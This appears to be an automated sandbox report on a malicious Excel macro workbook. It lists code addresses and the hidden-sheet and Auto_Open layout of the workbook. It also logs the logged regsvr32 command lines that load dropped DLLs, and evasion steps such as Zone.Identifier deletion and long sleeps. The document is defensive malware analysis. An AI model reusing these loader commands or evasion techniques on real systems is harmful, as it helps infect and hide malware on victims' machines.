                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D75E7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DB605
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DF6AE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C5717
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CB7B5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CF88D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CD933
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C192C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C7AB6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CDAE6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C1B3F
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C9B4C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C9C3D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DDC64
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D7CA5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D1DCF
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003D3E98
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CFEF2
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003CBF6E
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DFF4A
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003C5FA3
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_003DDFCE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00247A53
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00235AC9
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00238ED3
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024FADC
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024E978
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00233F40
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023DF44
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00240552
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023B1A1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00248BA1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002439B8
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002325E7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002431D5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00240A27
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024E63C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00239C3D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023323D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00234E03
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024B605
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00242606
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00239400
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00250A1E
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024C064
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024DC64
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024A455
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00232050
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023EC5D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00247CA5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002444A7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00242CAC
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024F6AE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00237AB6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002362BA
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00250887
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023F88D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00232E8C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023EA8C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00234497
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00243E98
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024609A
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023E4E2
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002506E7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024E2E1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023DAE6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024E4E3
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00248EF4
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023FEF2
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023D0F7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002492F0
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002486C1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024EECF
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002446DD
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023192C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023D933
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00244930
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00237336
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00231B3F
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00234D13
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00235717
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023AF67
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00236F64
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023BF6E
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024F571
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00234949
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024FF4A
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00239B4C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023C14C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024815D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00235FA3
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002351B7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024A1B1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024AFB1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023B7B5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023C7B4
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024B1BA
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00240B84
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00240F87
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0023C388
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00246B98
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024C5E5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002475E7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024A9EE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002451F0
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002353F6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002389F6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0024DFCE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00241DCF
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040EC5D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041C064
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00420A1E
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041E63C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00409C3D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00405AC9
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041EECF
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00408ED3
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040E4E2
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040FEF2
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00402E8C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041609A
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00412CAC
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040C14C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041E978
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00407336
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041C5E5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004025E7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004151F0
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00410B84
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00410F87
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00416B98
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041AFB1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040B7B5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004051B7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00402050
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00417A53
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041A455
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041DC64
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00409400
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00404E03
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041B605
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00412606
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00410A27
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040323D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004186C1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004146DD
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041FADC
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041E2E1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041E4E3
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004206E7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040DAE6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004192F0
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00418EF4
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040D0F7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00420887
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040EA8C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040F88D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00404497
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00413E98
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00417CA5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004144A7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041F6AE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00407AB6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004062BA
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00403F40
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040DF44
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00404949
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041FF4A
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00409B4C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00410552
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041815D
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00406F64
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040AF67
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040BF6E
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041F571
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00404D13
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00405717
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040192C
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00414930
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040D933
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00401B3F
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00411DCF
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041DFCE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004131D5
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004175E7
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041A9EE
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004053F6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004089F6
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040C388
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00418BA1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040B1A1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00405FA3
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041A1B1
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040C7B4
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004139B8
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0041B1BA
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1001A9E0 appears 189 times
                          Source: qd_34768.xlsmMacro extractor: Sheet name: PIMKE
                          Source: qd_34768.xlsmMacro extractor: Sheet name: PIMKE
                          Source: eVzUZ7dv5zBAXa5[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: eVzUZ7dv5zBAXa5[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: xewn.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: xewn.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: workbook.xmlBinary string: (2)\CIR\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F5AAA563-2BE5-4D04-A527-156FA41B3CA2}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Odjfs" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Dghdb" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Vghsg" sheetId="4" state="hidden" r:id="rId4"/><sheet name="Urgds" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Njkg" sheetId="6" state="hidden" r:id="rId6"/><sheet name="PIMKE" sheetId="7" state="hidden" r:id="rId7"/></sheets><definedNames><definedName name="IVFB1">PIMKE!$C$14</definedName><definedName name="IVFB2">PIMKE!$C$16</definedName><definedName name="IVFB3">PIMKE!$C$18</definedName><definedName name="IVFB4">PIMKE!$C$20</definedName><definedName name="IVFB5">PIMKE!$C$22</definedName><definedName name="IVFB6">PIMKE!$C$24</definedName><definedName name="IVFB7">PIMKE!$C$26</definedName><definedName name="_xlnm.Auto_Open567980">PIMKE!$C$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:Single"/><xcalcf:feature name="microsoft.com:FV"/><xcalcf:feature name="microsoft.com:CNMTM"/><xcalcf:feature name="microsoft.com:LET_WF"/><xcalcf:feature name="microsoft.com:LAMBDA_WF"/></xcalcf:calcFeatures></ext></extLst></workbook>
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 77620000 page execute and read and write
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 77740000 page execute and read and write
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 77620000 page execute and read and write
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 77740000 page execute and read and write
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 77620000 page execute and read and write
                          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 77740000 page execute and read and write
                          Source: qd_34768.xlsmReversingLabs: Detection: 40%
                          Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"
                          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$qd_34768.xlsmJump to behavior
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR229C.tmpJump to behavior
                          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/9@1/2
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001741F __EH_prolog,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0040F7F9 CreateToolhelp32Snapshot,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10009530 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,
                          Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: qd_34768.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
                          Source: qd_34768.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet5.xml
                          Source: qd_34768.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet6.xml
                          Source: qd_34768.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
                          Source: qd_34768.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001B2B0 push eax; ret
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001A9E0 push eax; ret
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dllJump to dropped file
                          Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy)Jump to dropped file
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xewn.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy)Jump to dropped file
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xewn.dllJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xewn.dllJump to dropped file

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd:Zone.Identifier read attributes | delete
                          Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn:Zone.Identifier read attributes | delete
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002B150 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002B900 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000EA9B IsIconic,GetWindowPlacement,GetWindowRect,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,
                          Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1916Thread sleep time: -240000s >= -30000s
                          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2264Thread sleep time: -180000s >= -30000s
                          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2916Thread sleep time: -120000s >= -30000s
                          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dllJump to dropped file
                          Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 3.1 %
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100492F7 FindFirstFileA,FindClose,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100489BD __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_004168D2 FindFirstFileW,
                          Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
